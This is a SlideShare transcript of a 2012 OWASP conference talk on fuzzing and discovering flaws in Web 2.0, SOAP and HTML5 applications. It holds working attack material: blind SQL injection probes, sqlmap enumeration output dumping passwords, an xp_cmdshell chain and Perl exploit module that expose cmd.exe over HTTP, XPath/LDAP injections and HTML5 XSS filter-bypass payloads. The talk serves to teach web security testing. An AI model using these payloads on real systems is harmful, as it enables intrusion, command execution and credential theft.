FIND ME IF YOU CAN – SMART FUZZING AND               DISCOVERY                  SHREERAJ SHAH       OWASP InfoSec India Co...
Who Are We?                                                http://shreeraj.blogspot.com                                   ...
Well Known Fact!• 90% of sites are vulnerable to one or more  vulnerabilities.• Exploitable ? – YES!• Most popular ones ar...
Traditional Fuzzing – Not working• Enterprise running on 2.0 wave - Portal• Technologies & Components – Dojo, Ajax, XML  S...
AppSec – Past, Present …Source - OWASP                 OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon   ...
Enterprise Technology Trend• 2007. Web services would rocket from $1.6  billion in 2004 to $34 billion. [IDC]• 2008. Web S...
Architecture                                            Documents                                  News                   ...
Environment   Internet                         DMZ                                          Trusted                       ...
Stack/Logic - Layers                                       • Android                                                      ...
Browser & Mobile – Arch.                                                                                            Mobile...
Case study - Pageflakes  OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
Case study - PageflakesWidgets                                                 Web Services          OWASP InfoSec India C...
FUZZING & DISCOVERYOWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
OWASP’s Risk Picture OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
Methodology, Scan and Attacks                                 Assets  Footprinting & Discovery                            ...
Discovery                                                    JSON           XML                                           ...
Attack & EntryOWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
GET/POST GET /login.aspx?username=shah HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-...
XML-RPCPOST /trade-rpc/getquote.rem HTTP/1.0TE: deflate,gzip;q=0.3Connection: TE, closeHost: xmlrpc.example.comContent-Typ...
SOAP<?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"          ...
REST<?xml version="1.0"?><p:Laptops xmlns:p="http://laptops.example.com"xmlns:xl="http://www.w3.org/1999/xlink"><Laptop id...
JSONmessage = {   from : "john@example.com",   to : "jerry@example.com",   subject : "I am fine",   body : "Long message h...
HIDDEN DISCOVERYOWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
Ajax driven siteOWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
Crawling with Ruby/Watir   OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
Attacker’s approach• Fuzzing over HTTP• Injecting faults with various set of payload• Try to raise the exception• Exceptio...
Challenges•   Technology fingerprinting•   Hidden calls•   Framework integration•   Entry points are multiple•   Tradition...
Old Approach• Forcing SQL errors.• Ideal for identifying database interfaces!          http://192.168.7.120/details.asp?id...
Error – Now? – forget it• Premature SQL query termination                                                                 ...
Blind SQL Injection• We have SQL injection point but it is not throwing any error message out  as part of its response. Ap...
Checks…•   AND 1=1•   DBO check    http://192.168.50.50/details.aspx?id=1+AND+USER_NAME()=dbo•   Wait delay call    http:/...
Running tools• SQL Map or Absinthe   D:toolssqlmap>sqlmap.py -b -u http://192.168.50.50/details.aspx?id=1      sqlmap/0.4 ...
Enumeration…D:toolssqlmap>sqlmap.py -b -u http://192.168.50.50/details.aspx?id=1 --dbs   sqlmap/0.4 coded by inquis <berna...
Enumeration…D:toolssqlmap>sqlmap.py -u http://192.168.50.50/details.aspx?id=1 --tables -Dcatalog   sqlmap/0.4 coded by inq...
Enumeration…D:toolssqlmap>sqlmap.py -u http://192.168.50.50/details.aspx?id=1 --dump -D catalog -T auth  sqlmap/0.4 coded ...
Blind ExploitingSet WshShell = WScript.CreateObject("WScript.Shell")Set ObjExec = WshShell.Exec("cmd.exe /c echo %windir%"...
Get the cmd.exe• Run command over HTTP/HTTPS• http://target/secret/system32/cmd.exe?+/c+set              OWASP InfoSec Ind...
Running…sub Exploit {my $self = shift;my $target_host = $self->GetVar(RHOST);my $target_port = $self->GetVar(RPORT);my $pa...
XPATH injection• XPATH parsing standard error• XPATH is method available for XML parsing• MS SQL server provides interface...
XPATH injectionstring fulltext = "";string coString =   "Provider=SQLOLEDB;Server=(local);database=order;User   ID=sa;Pass...
XPATH injectionstring credential =  "//users[@username="+user+" and  @password="+pass+"]";• XPATH parsing can be leveraged...
LDAP Injection                     Resource viewer :       http://www.something.com/res.cgi?type=1)(uid=*))•Notice the inj...
SOAP – INJECTIONS & FUZZING  OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
Fetching Calls• Identifying services layer calls            OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
Technology Identification• Location can be obtained from UDDI  as well, if already published.• WSDL location [ Access Poin...
SOAP request                                 SOAP                                                                     Enve...
SOAP response                                   SOAP                                                                     E...
HTML5 & CLIENT SIDE FUZZING  OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
HTML5 – Tags/Attributes/Events• Tags – media (audio/video), canvas  (getImageData), menu, embed,  buttons/commands, Form c...
HTML5 – XSS• Blacklist and filter will get bypassed• Lot of new signatures and possible ways to  execute scripts• XSS can ...
XSS variants• Media tags• Examples  – <video><source onerror="javascript:alert(1)“>  – <video onerror="javascript:alert(1)...
XSS variants• Exploiting autofocus  –   <input autofocus onfocus=alert(1)>  –   <select autofocus onfocus=alert(1)>  –   <...
XSS variants• MathML issues  – <math    href="javascript:alert(1)">CLICKME</math>  – <math> <maction    actiontype="status...
XSS variants• Form & Button etc.  – <form id="test" /><button form="test"    formaction="javascript:alert(1)">test  – <for...
DOM BASED INJECTIONSOWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
DOM with HTML5OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
DOM based XSS - Messaging• It is a sleeping giant in the Ajax applications  coupled with Web Messaging• Root cause   – DOM...
AJAX with HTML5 – DOM• Ajax function would be making a back-end call• Back-end would be returning JSON stream or  any othe...
APIs …• HTML5 few other APIs are interesting from  security standpoint  – File APIs – allows local file access and can mix...
CONCLUSION & QUESTIONSOWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
Upcoming SlideShare
Loading in …5
×

FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY

14,546 views

Published on

Published in: Technology
0 Comments
3 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
14,546
On SlideShare
0
From Embeds
0
Number of Embeds
1,241
Actions
Shares
0
Downloads
0
Comments
0
Likes
3
Embeds 0
No embeds

No notes for slide
  • One of the major sources of information: WSDL file
  • FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY

    1. 1. FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY SHREERAJ SHAH OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
    2. 2. Who Are We? http://shreeraj.blogspot.com http://shreeraj.blogspot.com shreeraj@blueinfy.com shreeraj@blueinfy.com http://www.blueinfy.com http://www.blueinfy.com• Founder & Director – Blueinfy Solutions Pvt. Ltd. (Brief) – SecurityExposure.com• Past experience – Net Square, Chase, IBM & Foundstone• Interest – Web security research• Published research – Articles / Papers – Securityfocus, O’erilly, DevX, InformIT etc. – Tools – wsScanner, scanweb2.0, AppMap, AppCodeScan, AppPrint etc. – Advisories - .Net, Java servers etc.• Books (Author) – Web 2.0 Security – Defending Ajax, RIA and SOA – Hacking Web Services – Web Hacking OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
    3. 3. Well Known Fact!• 90% of sites are vulnerable to one or more vulnerabilities.• Exploitable ? – YES!• Most popular ones are – SQLi & XSS• SQLi – complete compromise of the application …• XSS – Control over browser and exploitation OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
    4. 4. Traditional Fuzzing – Not working• Enterprise running on 2.0 wave - Portal• Technologies & Components – Dojo, Ajax, XML Services, Blog, Widgets• Scan with tools/products failed• Security issues and hacks – SQL injection over XML – Ajax driven XSS – Several XSS with Blog component – Several information leaks through JSON fuzzing – CSRF on both XML and JS-Array » HACKED » DEFENSE OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
    5. 5. AppSec – Past, Present …Source - OWASP OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon 5
    6. 6. Enterprise Technology Trend• 2007. Web services would rocket from $1.6 billion in 2004 to $34 billion. [IDC]• 2008. Web Services or Service-Oriented Architecture (SOA) would surge ahead.• 2009. Enterprise 2.0 in action and penetrating deeper into the corporate environment• 2010. Flex/Cloud/API era.• 2012. Mobile/HTML5 era. OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
    7. 7. Architecture Documents News Weather Mails Bank/Trade Browser Internet RSS feeds Ajax RIA (Flash) Internet Web 2.0 StartHTML / JS / DOM Blog Database Authentication Application Infrastructure Web Services End point OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
    8. 8. Environment Internet DMZ Trusted SOAP/JSON etc. MobileWeb 2.0 WServices E Scripted Application B Web Web Servers S Server Engine And E Web Static pages only Dynamic pages (HTML,HTM, etc.) (ASP,DHTML, PHP, Integrated R Client CGI, etc.) Framework V X I ASP.NET on C .Net Framework, E J2EE App Server, S Web Services, DB etc. Internal/Corporate OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
    9. 9. Stack/Logic - Layers • Android • iPhone/Pad • HTML • Other 5 • Storage • Flash Mobile • AMF • WebSocket • DOM • WebSQL • • JS • Storage Flex • XHR • XAMLServer sideComponents • Silverlight • WCF Presentation Layer • NET Business Layer Client side Data Access Layer Components Authentication (Browser) Communication etc. Runtime, Platform, Operating System Components OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
    10. 10. Browser & Mobile – Arch. Mobile HTML5 + CSS Silverlight FlashAPI (Media, Geo etc.) & Messaging Plug-In Presentation JavaScript DOM/Events Parser/Threads Process & Logic WebSQL Cache Storage XHR 1 & 2 WebSocket Plug-in Sockets Browser Native Network Services Network & Access SOP/CORS Sandbox Core Policies OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
    11. 11. Case study - Pageflakes OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
    12. 12. Case study - PageflakesWidgets Web Services OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
    13. 13. FUZZING & DISCOVERYOWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
    14. 14. OWASP’s Risk Picture OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
    15. 15. Methodology, Scan and Attacks Assets Footprinting & Discovery Config Scanning Enumeration & Crawling Code Scanning Attacks and ScanningBlack White Secure Coding Web Firewall Defense Secure Assets OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
    16. 16. Discovery JSON XML JS-Script JS-Object JS-ArrayOWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
    17. 17. Attack & EntryOWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
    18. 18. GET/POST GET /login.aspx?username=shah HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alivePOST http://example.com/cgi-bin/search.cgi HTTP/1.1Host: example.comUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; rv:1.7.3) Gecko/20040913 Firefox/0.10Accept: text/xml, application/xml, application/xhtml+xml, text/html;q=0.9, text/plain;q=0.8, image/png,*/*;q=0.5Keep-Alive: 300Referer: http://example.com/Content-Type: application/x-www-form-urlencodedContent-Length: 17search=searchtext OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
    19. 19. XML-RPCPOST /trade-rpc/getquote.rem HTTP/1.0TE: deflate,gzip;q=0.3Connection: TE, closeHost: xmlrpc.example.comContent-Type: text/xmlContent-Length: 161<?xml version="1.0"?><methodCall><methodName>stocks.getquote</methodName><params><param><value><string>MSFT</string></value></param></params></methodCall> OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
    20. 20. SOAP<?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <soap:Body> <getQuotes xmlns="http://tempuri.org/"> <compid>MSFT</compid> </getQuotes> </soap:Body> </soap:Envelope> OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
    21. 21. REST<?xml version="1.0"?><p:Laptops xmlns:p="http://laptops.example.com"xmlns:xl="http://www.w3.org/1999/xlink"><Laptop id="0123" xl:href="http://www.parts-depot.com/laptops/0123"/>< Laptop id="0348" xl:href="http://www.parts-depot.com laptops /0348"/>< Laptop id="0321" xl:href="http://www.parts-depot.com/ laptops /0321"/>……</p:Laptops> OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
    22. 22. JSONmessage = { from : "john@example.com", to : "jerry@example.com", subject : "I am fine", body : "Long message here", showsubject : function(){document.write(this.subject)}}; OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
    23. 23. HIDDEN DISCOVERYOWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
    24. 24. Ajax driven siteOWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
    25. 25. Crawling with Ruby/Watir OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
    26. 26. Attacker’s approach• Fuzzing over HTTP• Injecting faults with various set of payload• Try to raise the exception• Exception throw message back as part of HTTP response• Scanning response for signatures• If signature found, it becomes interesting entry for exploitation OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
    27. 27. Challenges• Technology fingerprinting• Hidden calls• Framework integration• Entry points are multiple• Traditional fuzzing will not work• Auto assessment can be challenge• Behavioral assessment with Artificial intelligence OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
    28. 28. Old Approach• Forcing SQL errors.• Ideal for identifying database interfaces! http://192.168.7.120/details.asp?id= ‘3 select * from items where product_id = ‘3 DB OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
    29. 29. Error – Now? – forget it• Premature SQL query termination We now have an SQL injection point. OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
    30. 30. Blind SQL Injection• We have SQL injection point but it is not throwing any error message out as part of its response. Application is sending customized error page which is not revealing any signature by which we can deduce potential SQL flaw.• Knowing SQL injection point or loophole in web application, xp_cmdshell seems to be working. But we can’t say is it working or not since it doesn’t return any meaningful signature. This is “blind xp_cmdshell”.• Firewall don’t allow outbound traffic so can’t do ftp, tftp, ping etc from the box to the Internet by which you can confirm execution of the command on the target system.• We don’t know the actual path to webroot so can’t copy file to location which can be accessed over HTTP or HTTPS later to confirm the execution of the command.• If we know path to webroot and directory structure but can’t find execute permission on it so can’t copy cmd.exe or any other binary and execute over HTTP/HTTPS. OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
    31. 31. Checks…• AND 1=1• DBO check http://192.168.50.50/details.aspx?id=1+AND+USER_NAME()=dbo• Wait delay call http://192.168.50.50/details.aspx?id=1;waitfor+delay+0:0:10• (SELECT+ASCII(SUBSTRING((a.loginame),1,1)) +FROM+master..sysprocesses+AS+a+WHERE+a.spid+=+@@SPID)=115• http://www.dvds4less.net/details.aspx?id=1+AND+ (SELECT+ASCII(SUBSTRING((a.loginame),1,1)) +FROM+master..sysprocesses+AS+a+WHERE+a.spid+=+@@SPID)=114• http://www.dvds4less.net/details.aspx?id=1+AND+ (SELECT+ASCII(SUBSTRING((a.loginame),2,1)) +FROM+master..sysprocesses+AS+a+WHERE+a.spid+=+@@SPID)=97 OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
    32. 32. Running tools• SQL Map or Absinthe D:toolssqlmap>sqlmap.py -b -u http://192.168.50.50/details.aspx?id=1 sqlmap/0.4 coded by inquis <bernardo.damele@gmail.com> and belch <daniele.bellucci@gmail.com> [*] starting at: 18:47:58 [18:48:00] [WARNING] the remote DMBS is not MySQL [18:48:00] [WARNING] the remote DMBS is not PostgreSQL remote DBMS: Microsoft SQL Server banner: --- Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) Oct 14 2005 00:33:37 Copyright (c) 1988-2005 Microsoft Corporation Express Edition on Windows NT 5.2 (Build 3790: Service Pack 2) --- [*] shutting down at: 18:48:14 OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
    33. 33. Enumeration…D:toolssqlmap>sqlmap.py -b -u http://192.168.50.50/details.aspx?id=1 --dbs sqlmap/0.4 coded by inquis <bernardo.damele@gmail.com> and belch <daniele.bellucci@gmail.com>[*] starting at: 18:53:10[18:53:12] [WARNING] the remote DMBS is not MySQL[18:53:12] [WARNING] the remote DMBS is not PostgreSQLremote DBMS: Microsoft SQL Serverbanner:---Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) Oct 14 2005 00:33:37 Copyright (c) 1988-2005 Microsoft Corporation Express Edition on Windows NT 5.2 (Build 3790: Service Pack 2)---available databases [9]:[*] CmdExec_example[*] Dashboard[*] catalog[*] demotrading[*] master[*] model[*] msdb[*] order[*] tempdb[*] shutting down at: 18:55:07 OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
    34. 34. Enumeration…D:toolssqlmap>sqlmap.py -u http://192.168.50.50/details.aspx?id=1 --tables -Dcatalog sqlmap/0.4 coded by inquis <bernardo.damele@gmail.com> and belch <daniele.bellucci@gmail.com>[*] starting at: 18:59:21[18:59:22] [WARNING] the remote DMBS is not MySQL[18:59:22] [WARNING] the remote DMBS is not PostgreSQLremote DBMS: Microsoft SQL ServerDatabase: catalog[3 tables]+--------------+| auth || dtproperties || items |+--------------+ OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
    35. 35. Enumeration…D:toolssqlmap>sqlmap.py -u http://192.168.50.50/details.aspx?id=1 --dump -D catalog -T auth sqlmap/0.4 coded by inquis <bernardo.damele@gmail.com> and belch <daniele.bellucci@gmail.com>[*] starting at: 19:01:27[19:01:28] [WARNING] the remote DMBS is not MySQL[19:01:28] [WARNING] the remote DMBS is not PostgreSQLremote DBMS: Microsoft SQL ServerDatabase: catalogTable: auth[3 entries]+--------+------+---------+| access | user | pass |+--------+------+---------+| 101010 | dbo | john123 || 110011 | | great || 001011 | | loveit |+--------+------+---------+ OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
    36. 36. Blind ExploitingSet WshShell = WScript.CreateObject("WScript.Shell")Set ObjExec = WshShell.Exec("cmd.exe /c echo %windir%")windir = ObjExec.StdOut.ReadLine()Set Root = GetObject("IIS://LocalHost/W3SVC/1/ROOT")Set Dir = Root.Create("IIsWebVirtualDir", "secret")Dir.Path = windirDir.AccessExecute = TrueDir.SetInfohttp://target/details.asp?id=1;exec+master..xp_cmdshell+’echo Set WshShell =WScript.CreateObject("WScript.Shell") > c:secret.vbs’…..…..…..http://target/details.asp?id=1;exec+master..xp_cmdshell+’echo Dir.SetInfo>> c:secret.vbs’http://target/details.asp?id=1;exec+master..xp_cmdshell+cscript+c:secret.vbs’ OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
    37. 37. Get the cmd.exe• Run command over HTTP/HTTPS• http://target/secret/system32/cmd.exe?+/c+set OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
    38. 38. Running…sub Exploit {my $self = shift;my $target_host = $self->GetVar(RHOST);my $target_port = $self->GetVar(RPORT);my $path = $self->GetVar(RPATH);my $vhost = $self->GetVar(VHOST);my @url = split(/#/, $path);my @payload =("EXEC+master..xp_cmdshell+echo+Set+WshShell+=+WScript.CreateObject("WScript.Shell")>c:secret.vbs","EXEC+master..xp_cmdshell+echo+Set+Root+=+GetObject("IIS://LocalHost/W3SVC/1/ROOT")>>c:secret.vbs","EXEC+master..xp_cmdshell+echo+Set+Dir+=+Root.Create("IIsWebVirtualDir","secret")>>c:secret.vb s","EXEC+master..xp_cmdshell+echo+Dir.Path+=+"c:winntsystem32">>c:secret.vbs","EXEC+master..xp_cmdshell+echo+Dir.AccessExecute+=+True>>c:secret.vbs","EXEC+master..xp_cmdshell+echo+Dir.SetInfo>>c:secret.vbs","EXEC+master..xp_cmdshell+cscript+c:secret.vbs");$self->PrintLine("[+] Sending SQL injection payload...");for(my $count=0;$count<=6;$count++).. OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
    39. 39. XPATH injection• XPATH parsing standard error• XPATH is method available for XML parsing• MS SQL server provides interface and one can get table content in XML format.• Once this is fetched one can run XPATH queries and obtain results.• What if username/password parsing done on using XPATH – XPATH injection OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
    40. 40. XPATH injectionstring fulltext = "";string coString = "Provider=SQLOLEDB;Server=(local);database=order;User ID=sa;Password=mypass"; SqlXmlCommand co = new SqlXmlCommand(coString); co.RootTag="Credential"; co.CommandType = SqlXmlCommandType.Sql; co.CommandText = "SELECT * FROM users for xml Auto"; XmlReader xr = co.ExecuteXmlReader(); xr.MoveToContent(); fulltext = xr.ReadOuterXml(); XmlDocument doc = new XmlDocument(); doc.LoadXml(fulltext); string credential = "//users[@username="+user+" and @password="+pass+"]"; XmlNodeList xmln = doc.SelectNodes(credential); string temp; if(xmln.Count > 0) { //True } else //false OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
    41. 41. XPATH injectionstring credential = "//users[@username="+user+" and @password="+pass+"]";• XPATH parsing can be leveraged by passing following string or 1=1 or =‘• This will always true on the first node and user can get access as who ever is first user.Bingo! OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
    42. 42. LDAP Injection Resource viewer : http://www.something.com/res.cgi?type=1)(uid=*))•Notice the injection•Attacker bypasses the user id check•(S)he can view all machines now OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
    43. 43. SOAP – INJECTIONS & FUZZING OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
    44. 44. Fetching Calls• Identifying services layer calls OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
    45. 45. Technology Identification• Location can be obtained from UDDI as well, if already published.• WSDL location [ Access Point ]http://192.168.11.2/ws/dvds4less.asmx?wsdl .asmx – indicates .Net server from MS OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
    46. 46. SOAP request SOAP Envelope<?xml version="1.0" encoding="utf-16"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <soap:Body> <getProductInfo xmlns="http://tempuri.org/"> <id>1</id> </getProductInfo> </soap:Body></soap:Envelope>Input to themethod Method Call OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
    47. 47. SOAP response SOAP Envelope<?xml version="1.0" encoding="utf-16"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <soap:Body> <getProductInfoResponse xmlns="http://tempuri.org/"> <getProductInfoResult>/(1)Finding Nemo($14.99)/</getProductInfoResult> </getProductInfoResponse> </soap:Body></soap:Envelope>Output to themethod Method response OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
    48. 48. HTML5 & CLIENT SIDE FUZZING OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
    49. 49. HTML5 – Tags/Attributes/Events• Tags – media (audio/video), canvas (getImageData), menu, embed, buttons/commands, Form control (keys)• Attributes – form, submit, autofocus, sandbox, manifest, rel etc.• Events/Objects – Navigation (_self), Editable content, Drag-Drop APIs, pushState (History) etc. 49 OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
    50. 50. HTML5 – XSS• Blacklist and filter will get bypassed• Lot of new signatures and possible ways to execute scripts• XSS can be injected from tags and events• New attributes are available for XSS payload 50 OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
    51. 51. XSS variants• Media tags• Examples – <video><source onerror="javascript:alert(1)“> – <video onerror="javascript:alert(1)"><source> 51 OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
    52. 52. XSS variants• Exploiting autofocus – <input autofocus onfocus=alert(1)> – <select autofocus onfocus=alert(1)> – <textarea autofocus onfocus=alert(1)> – <keygen autofocus onfocus=alert(1)> 52 OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
    53. 53. XSS variants• MathML issues – <math href="javascript:alert(1)">CLICKME</math> – <math> <maction actiontype="statusline#http://Blueinfy.com" xlink:href="javascript:alert(1)">CLICKME</mactio n> </math> 53 OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
    54. 54. XSS variants• Form & Button etc. – <form id="test" /><button form="test" formaction="javascript:alert(1)">test – <form><button formaction="javascript:alert(1)">test• Etc … and more … 54 OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
    55. 55. DOM BASED INJECTIONSOWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
    56. 56. DOM with HTML5OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
    57. 57. DOM based XSS - Messaging• It is a sleeping giant in the Ajax applications coupled with Web Messaging• Root cause – DOM is already loaded – Application is single page and DOM remains same – New information coming needs to be injected in using various DOM calls like eval() – Information is coming from untrusted sources – JSONP usage – Web Workers and callbacks OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
    58. 58. AJAX with HTML5 – DOM• Ajax function would be making a back-end call• Back-end would be returning JSON stream or any other and get injected in DOM• In some libraries their content type would allow them to get loaded in browser directly• In that case bypassing DOM processing… OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
    59. 59. APIs …• HTML5 few other APIs are interesting from security standpoint – File APIs – allows local file access and can mixed with ClickJacking and other attacks to gain client files. – Drag-Drop APIs – exploiting self XSS and few other tricks, hijacking cookies … – Lot more to explore and defend… OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
    60. 60. CONCLUSION & QUESTIONSOWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon

    ×